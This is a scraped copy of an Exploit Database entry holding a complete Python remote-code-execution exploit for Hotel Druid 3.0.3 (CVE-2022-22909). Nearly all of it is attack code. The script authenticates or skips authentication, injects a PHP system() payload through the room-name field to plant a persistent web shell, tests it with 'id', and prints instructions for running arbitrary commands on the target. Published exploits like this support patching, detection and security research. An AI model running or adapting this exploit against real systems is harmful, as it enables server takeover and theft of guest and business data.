Hotel Druid 3.0.3 – Remote Code Execution (RCE)

Exploit Database
134 阅读

作者： 0z09e

日期： 2022-02-18
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/50754/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

# Exploit Title: Hotel Druid 3.0.3 - Remote Code Execution (RCE)

# Date: 05/01/2022

# Exploit Author: 0z09e (https://twitter.com/0z09e)

# Vendor Homepage: https://www.hoteldruid.com/

# Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz

# Version: 3.0.3

# CVE : CVE-2022-22909

#!/usr/bin/python3

import requests

import argparse

def login( target , username = "" , password = "", noauth=False):

login_data = {

"vers_hinc" : "1",

"nome_utente_phpr" : username,

"password_phpr" : password

}

if not noauth:

login_req = requests.post(f"{target}/inizio.php" , data=login_data , verify=False )

if '<a class="nav" id="nb_men" href="https://www.exploit-db.com/exploits/50754/inizio.php?id_sessione=' in login_req.text:

token = login_req.text.split('<a class="nav" id="nb_men" href="https://www.exploit-db.com/exploits/50754/inizio.php?id_sessione=')[1].split('"> <b>')[0]

anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]

ret_data = {"token" : token , "anno" : anno}

#print("ret data" + ret_data)

return ret_data

else:

return False

else:

login_req = requests.get(f"{target}/inizio.php" , verify=False )

try:

anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]

token = ""

ret_data = {"token" : token , "anno" : anno}

return ret_data

except:

return False

def check_privilege(target , anno , token=""):

priv_req = requests.get(f"{target}/visualizza_tabelle.php?id_sessione={token}&tipo_tabella=appartamenti" , verify=False)

#print(priv_req.text)

if "Modify" in priv_req.text:

return True

else:

return False

def add_room(target , anno , token=""):

add_room_data = {

"anno": anno,

"id_sessione": token,

"n_app":"{${system($_REQUEST['cmd'])}}",

"crea_app":"SI",

"crea_letti":"",

"n_letti":"",

"tipo_tabella":"appartamenti"

}

add_req = requests.post(f"{target}/visualizza_tabelle.php" , data=add_room_data , verify=False)

#print(add_req.text)

if "has been added" in add_req.text:

return True

else:

return False

def test_code_execution(target):

code_execution_req = requests.get(f"{target}/dati/selectappartamenti.php?cmd=id")

if "uid=" in code_execution_req.text:

return code_execution_req.text.split("\n")[0]

else:

return False

def main():

banner = """\n /$$ /$$ /$$ /$$ /$$$$$$$/$$ /$$

| $$| $$| $$| $$| $$__$$|__/| $$

| $$| $$/$$$$$$/$$$$$$/$$$$$$ | $$| $$\ $$/$$$$$$/$$ /$$ /$$/$$$$$$$

| $$$$$$$$ /$$__$$|_$$_/ /$$__$$| $$| $$| $$ /$$__$$| $$| $$| $$ /$$__$$

| $$__$$| $$\ $$| $$| $$$$$$$$| $$| $$| $$| $$\__/| $$| $$| $$| $$| $$

| $$| $$| $$| $$| $$ /$$| $$_____/| $$| $$| $$| $$| $$| $$| $$| $$| $$

| $$| $$|$$$$$$/|$$$$/|$$$$$$$| $$| $$$$$$$/| $$|$$$$$$/| $$|$$$$$$$

|__/|__/ \______/\___/ \_______/|__/|_______/ |__/ \______/ |__/ \_______/\n\nExploit By - 0z09e (https://twitter.com/0z09e)\n\n"""

parser = argparse.ArgumentParser()

req_args = parser.add_argument_group('required arguments')

req_args.add_argument("-t" ,"--target" , help="Target URL. Example : http://10.20.30.40/path/to/hoteldruid" , required=True)

req_args.add_argument("-u" , "--username" , help="Username" , required=False)

req_args.add_argument("-p" , "--password" , help="password", required=False)

req_args.add_argument("--noauth" , action="store_true" , default=False , help="If No authentication is required to access the dashboard", required=False)

args = parser.parse_args()

target = args.target

if target[-1] == "/":

target = target[:-1]

noauth = args.noauth

username = args.username

password = args.password

if noauth == False and (username == None or password == None):

print('[-] Please provide the authentication method.' )

quit()

print(banner)

if not noauth:

print(f"[*] Logging in with the credential {username}:{password}")

login_result = login(username = username , password = password , target = target)

if login_result != False:

token = login_result.get('token')

anno = login_result.get('anno')

else:

print("[-] Login failed, Check your credential or check if login is required or not .")

quit()

else:

print('[*] Trying to access the Dashboard.')

login_result = login(username = username , password = password , target = target , noauth=True)

if login_result != False:

token = login_result.get('token')

anno = login_result.get('anno')

else:

print('[-] Unable to access the dashboard, Maybe the dashboard is protected with credential.')

exit()

print("[*] Checking the privilege of the user.")

if check_privilege(target= target , token=token , anno=anno):

print("[+] User has the privilege to add room.")

else:

print("[-] User doesn't have the privilege to add room.")

exit()

print("[*] Adding a new room.")

if add_room(target = target , anno=anno , token=token):

print('[+] Room has been added successfully.')

else:

print('[-] Unknown error occured, unable to add room. Maybe the room has already been added')

exit()

print('[*] Testing code exection')

output = test_code_execution(target = target)

if output != False:

print(f"[+] Code executed successfully, Go to {target}/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.")

print(f'[+] Example : {target}/dati/selectappartamenti.php?cmd=id')

print(f"[+] Example Output : {output}")

exit()

else:

print(f"[-] Code execution failed. If the Target is Windows, Check {target}/dati/selectappartamenti.php and try execute the code with the parameter 'cmd'. Example : {target}/dati/selectappartamenti.php?cmd=hostname")

exit()

main()